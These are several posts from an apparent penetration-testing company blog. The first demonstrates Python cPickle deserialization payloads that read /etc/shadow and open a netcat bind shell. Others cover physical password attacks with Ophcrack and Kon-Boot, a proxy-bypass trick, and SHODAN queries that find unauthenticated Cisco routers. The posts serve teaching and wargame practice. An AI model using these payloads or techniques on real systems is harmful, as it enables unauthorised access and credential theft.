Python cPickle: Allows For Arbitrary Code Execution
Hello All,
I was passing some time playing one of our new wargames at Smash The Stack called Amateria and came across something I’ve not really looked at before, Python’s cPickle library it allows for some interesting fun when unpickling untrusted data over a socket or any network communication.
Basically cPickle is a library that enables Python to perform object serialization. Pickling and unpickling are the terms used in the Python community to describe serialization and deserialization respectively. If you are unfamiliar with these terms then I suggest taking a look over the following documentation:
PyMOTW: pickle and cPickle
Pickle — Python Object Serialization
Onto the fun stuff… and what better way to start than with a nice little example:
root@bt:~# python
Python 2.5.2 (r252:60911, Oct 5 2008, 19:24:49)
[GCC 4.3.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import cPickle
>>> exploit = "cos\nsystem\n(S'cat /etc/shadow | head -n 5'\ntR.'\ntR."
>>> cPickle.loads(exploit)
root:$6$m7ndoM3p$JRVXomVQFn/KlkVbjFqCcjlMAD31QlCtoHnoWiE95Fx8Vvwkc8KH81DEePpjycglYiX98usSoESUnml3e6Nlf.:14951:0:99999:7:::
daemon:x:14592:0:99999:7:::
bin:x:14592:0:99999:7:::
sys:x:14592:0:99999:7:::
sync:x:14592:0:99999:7:::
0
>>>
OK, so what happened here? Before I explain, let’s have a look at another example that might help clarify what is going on here:
>>> import pickletools
>>> print pickletools.dis(exploit)
0: c GLOBAL 'os system'
11: ( MARK
12: S STRING 'cat /etc/shadow | head -n 5'
43: t TUPLE (MARK at 11)
44: R REDUCE
45: . STOP
highest protocol among opcodes = 0
None
>>>
As you can see it loads the module os, calls the system function with the command: “cat /etc/shadow | head -n 5″, and that is why the first 5 lines of the shadow file were echoed back to our prompt. So we can construct pickled data and pass that to cPickle.loads it basically executes our commands in the context of the user that python runs as, this is interesting.. I won’t delve too much into this as I don’t want to spoil the wargame level but I just thought it was a handy little trick to have in you’re arsenal 
Let’s take a look at another little example shall we to see the power of this:
root@bt:~# python
Python 2.5.2 (r252:60911, Oct 5 2008, 19:24:49)
[GCC 4.3.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import cPickle
>>> import pickletools
>>> exploit = "cos\nsystem\n(S'/bin/nc -l -p 56758 -c /bin/sh'\ntR.'\ntR."
>>> pickletools.dis(exploit)
0: c GLOBAL 'os system'
11: ( MARK
12: S STRING '/bin/nc -l -p 56758 -c /bin/sh'
46: t TUPLE (MARK at 11)
47: R REDUCE
48: . STOP
highest protocol among opcodes = 0
>>> cPickle.loads(exploit)
Now if we turn to another terminal and type: ‘echo -e “cat /etc/passwd” | nc 0 56758′ we should see something like this:
root@bt:~# echo -e "cat /etc/passwd" | nc 0 56758
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
messagebus:x:104:113::/var/run/dbus:/bin/false
avahi:x:105:114:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
polkituser:x:106:116:PolicyKit,,,:/var/run/PolicyKit:/bin/false
haldaemon:x:107:117:Hardware abstraction layer,,,:/var/run/hald:/bin/false
mysql:x:108:118:MySQL Server,,,:/var/lib/mysql:/bin/false
miredo:x:109:65534::/var/run/miredo:/bin/false
stunnel4:x:110:119::/var/run/stunnel4:/bin/false
miredo-server:x:111:65534::/var/run/miredo-server:/bin/false
smmta:x:112:120:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:113:121:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
dhcpd:x:114:122::/nonexistent:/bin/false
clamav:x:115:124::/var/lib/clamav:/bin/false
nstxd:x:116:65534::/var/run/nstxd:/bin/false
ntop:x:117:125::/var/lib/ntop:/bin/false
postgres:x:118:127:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
arpalert:x:119:128::/var/lib/arpalert:/bin/sh
privoxy:x:120:65534::/etc/privoxy:/bin/false
debian-tor:x:121:129::/var/lib/tor:/bin/bash
firebird:x:122:130::/var/lib/firebird:/bin/bash
saned:x:123:131::/home/saned:/bin/false
snmp:x:124:65534::/var/lib/snmp:/bin/false
statd:x:125:65534::/var/lib/nfs:/bin/false
festival:x:126:29::/home/festival:/bin/false
We have a remote shell now on the box
If you use cPickle on sockets or in any kind of network communication you’re pretty much owned For some further reading on the subject check out the following link:
Now take you’re new found knowledge and apply it to the Amateria wargame. If you get stuck or need to discuss any of the levels look at the main website for IRC connection details, the wargames channels are named after the wargames.
Enjoy!
Firefox 4 Web Console
The final version of Firefox 4 is almost here and since it’s my main tool during pentesting I has been checking frequently to be sure I’m not going to be missing anything when the change comes.
As the change is big, some of the extensions are slowly updating their versions to ensure compatibility with the new release (I just did today a quick update of the Hackbar extension to ensure compatibility with FF4) so I still stuck at Firefox 3 to use all the plugins I use to install.
One of these plugins is Live HTTP Headers, a simple plugin that allows me to check what is going under hood in the browser, check request and parameters to later modify and test the website functionality. Well, this extension looks like is not getting (yet) a FF4 update 
But today I discovered a new feature in FF4: Web Console. With a tricky shortcut: Ctrl+Shift+K it reveals a debug console with information about HTML/CSS errors, Javascript debugging information and a Net tab to do exactly the same that Live HTTP Headers does: display web browser request and related headers.
OK, maybe it’s not the same ( you cant filter extensions like gif or jpg images) but it also comes with another great stuff, like saving the HTML code generated by the page, allowing quickly review of the result of the request.
Still many things to sort before changing FF3 to FF4 for pentesting but the future looks promising
Using Google to bypass web proxies
Maybe this is something you already know, something is something someone posted long time ago, but I want to share today a quick trick we use when we are on a customer site doing a testing.
Sometimes, during testing, you need to search an exploit, a blog post or some resource to help you suscesfully exploit the vulnerability we just found ( or we think it can be a vulnerability) but the internet access is limited by the company network policy. Yes, we can boot our machines, use tethering with the mobile, download to our machine the code, copy into a USB stick, copy into the testing machine and then execute it. But I’m a bit lazy… (that’s the reason I work with computers, let’s the machines do the hard work 
)
Recently, while playing with User Agent strings I discovered a Google service to render website for mobiles. It’s like the Google Cache service but with the advantage you can actually browser the website and, i. e., perform search. Maybe this doesn’t work all the time, but, for me, it worked for me last week so it deserves a try!
Ta!
Ophcrack and Konboot
Floppies, CD-ROM’s and USB Drives Oh my!
I’m going be doing a bit of an insight to physical password attacks as in sat in front of your computer.
I’m going to show you two tools, those tools are Ophcrack and Konboot
the reason I have chosen these two is because firstly it’s incredibly easy to use these tools and also the two have different features of the common goal (compromising the machine/account) .
So whats the difference?
Ophcrack will try to crack your password so that you know it – this could be handy for trying that username and password on other machines/Accounts this uses rainbow tables something I wont be discussing today but will include links for those who want to understand what is actually happening
Konboot is even more impressive …
From there website…
“Kon-Boot is an prototype piece of software which allows to change contents of a linux kernel (and now Windows kernel also!) on the fly (while booting). In the current compilation state it allows to log into a linux system as ‘root’ user without typing the correct password or to elevate privileges from current user to root. For Windows systems it allows to enter any password protected profile without any knowledge of the password. It was actually started as silly project of mine, which was born from my never-ending memory problems Secondly it was mainly created for Ubuntu, later i have made few add-ons to cover some other linux distributions. Finally, please consider this is my first linux project so far Entire Kon-Boot was written in pure x86 assembly, using old grandpa-geezer TASM 4.0”
So if you missed any of that the skinny is that Kon-Boot will pretty much ignore the authentication part for you on a windows (and some linux) operating system – Sick.
Let’s Look at Ophcrack first
Before we start I’m using VMware so I can Screencast this… so what you see here can be applied to an actual machine you will need some CD burning software to put the Ophcrack image to a CD (and kon boot) I’ll provide links – altho it’s virtualized there is no difference to a physical machine.
probably best to watch the video full screen.
I hope the screencast wasn’t to much of a roller-coaster for you
Questions?
LINKS:
Ophcrack – http://ophcrack.sourceforge.net/
Kon-Boot – http://www.piotrbania.com/all/kon-boot/
ISO burner for windows – http://isorecorder.alexfeinman.com/isorecorder.htm
Full Disk encryption – speak to our guys at pentura.
SHODAN Power…..
In this post I’ll demonstrate how search engine SHODAN can be used to identify and access unprotected network devices….and there are many such devices on the Internet.
Since SHODAN appeared onto the Internet scene, I’ve used it a fair bit for enumerating information from target address ranges. I’ve also just finished watching a a great DEFCON 18 presentation titled SHODAN For Penetration Testing by Michael Schearer 
For those unaware, SHODAN is a Computer Search Engine that crawls the Internet, collects banner and version information for IP addresses offering FTP, HTTP, TELNET and (if you pay SHODAN for ‘credits’) HTTPS/SSL services. SHODAN then indexes this gathered data ready for anyone to search. Why is this useful? For ethical and not so ethical reasons, it offers a way of gathering technical information about a target IP, IP Network/Range, domains etc. and could include Server version information, HTTP Header results and FTP login banners for IPs that SHODAN has crawled.
Its a very useful tool and, as I am about to explain, can be used in the same way that Google is used to make clever search queries that, for example, would return all URLs that have “passwords.xls” in them 
Here is the SHODAN homepage (www.shodanhq.com). At the top is the search box. I’ve logged into SHODAN using a GMail account and this gives access to additional search ‘operators’.
In my last post, I used Cisco IOS devices as my target and I’m going to do the same here 
As you may already be aware, Cisco IOS devices typically support Telnet, Web and SSH as for remote device management. I already know that the web services in Cisco IOS set the “server” HTTP header to “cisco-ios”. I want to create a query that will give me all these Cisco IOS devices running the IOS web service on TCP port 80 (HTTP).
Shodan Search Query = “cisco-ios port:80”
This query searches for hosts that have port 80 open, and contain “cisco-ios” in the “server” HTTP header results:
Quite a number of results have been return. The IP address (and DNS name) of the host appears on the left (I’ve blacked out this information). The banner data, grabbed by Shodan when crawling, is on the right next to each host. I’m going to narrow my search a bit and modify my query to only include IP address registered in the UK; country code of “GB”
Shodan Search Query = “cisco-ios port:80 country:GB”
This query searches for hosts that have port 80 open, and contain “cisco-ios” in the “server” HTTP header results and limits the results to UK registered IP addresses.
These results are only for UK registered addresses; the little flag icon below the IP address indicates this. You will notice the HTTP banner information returned for each host address indicates the host responded with a “ HTTP 401 Unauthorized”, since Shodan stores and indexes these banner/HTTP responses for each host. I want to identify hosts that do NOT return a HTTP 401 error. I’m going to modify my search query a bit more to include only results where a “ HTTP 200 OK” response are received.
Shodan Search Query = “cisco-ios 200 port:80 country:GB”
This query searches for hosts that have port 80 open, and contain “cisco-ios” in the “server” HTTP header results, limits the results to UK registered IP addresses and returns only those hosts with a HTTP 200 OK response.
Now I have a list of IP addresses that returned an HTTP “200 OK” when SHODAN crawled them. With this information provided by SHODAN, I’ve now identified many Cisco IOS devices on the Internet, running a web server that require no authentication
SHODAN provides a link to the IP address on the left. You click that and your browser will connect to that IP over HTTP.
Oh dear…this router is accessible. 
I could modify the URL and list the IOS configuration if I wish…..
Or I can execute commands using the “configure” link
Summary
SHODAN can be used for many different search queries. If you have an idea of what your looking for (banners, headers etc) you can ask SHODAN and see what you get in return. SHODAN can be used to identify hosts that are running vulnerable HTTP/FTP/Telnet services; if you know the tell-tale banners then ask SHODAN!
Using the example above, many Cisco IOS provide unauthenticated access. Perhaps the administrators aren’t even aware? 
Virus at train station ticket machine
Every morning I walk to the Reading train station and get a return ticket to the Mortimer station. As I don’t like carrying cash everywhere I use to pay with credit card. But this is going to change… Today I went to one of the machines to get my ticket when I discovered that something was going wrong:
I looked it closer and what I saw scared me: an antivirus (I think it’s Norton) message displaying that something had happened in the machine:
Scan type: Auto-Protect Scan
Event: Security Risk Found!
Threat: W32.Dowadup.B
File: C:\WINDOWS\System32\kwtjuj.tg
Location: Unknown Storage
Computer: RDG81
User: SHERE-GW\RDGRSU-SUP
Action take: Clean failed : Quarantine failed : Delete succeeded : Acce (incomplete, probably Access denied)
Date found: 17 November 2010 17:21:28
But the most scary part of the window is the fact that the number of notifications is 10! This machine has had at least (because maybe the antivirus didn’t catch all the threads…) ten attacks/tries of infection! I don’t know how they configure their network but hope First Great Western doesn’t not have the ticket machines in the same network that the rest of their machines. Also, with this screen we can guess it’s running a Windows XP and probably using Internet Explorer 6…
Tomorrow I’ll carry some cash for my ticket, and you?
P.S. Yes, people looked at me weird when I was doing the pics 
Vulnerability Development: Buffer Overflows: RET Overwrite…
Hello all, my name is Mike Evans and I’m a security consultant here at Pentura. The other day I was asked by a certain Spanish someone if I could contribute to the blog . At first I wasn’t too sure what to write about, however after a while I decided to write about Vulnerability Development as this is an area of research I am very passionate about. Now this is a very broad topic and I am still learning all about it. What I plan to do is start at the very beginning and take you through it a post at a time, building on each post as we go. First of all I want to talk about the various types of vulnerabilities; what they are, how to control them and how to exploit them. Then I want to go over the various protections that have been implemented to try and mitigate these vulnerabilities and how to bypass these mitigations. This is the part I love about vulnerability development, the way hackers find ways around the protections implemented by software and hardware vendors, this is definitely the thrill for me.
To start with, in this post, I am going to talk about Buffer Overflows; What they are? How to control them and how to exploit them. Before we dive into the fun stuff if you don’t know anything about memory management, the stack data structure and the basics of the assembly programming language then I suggest you take a moment to read over the following links:
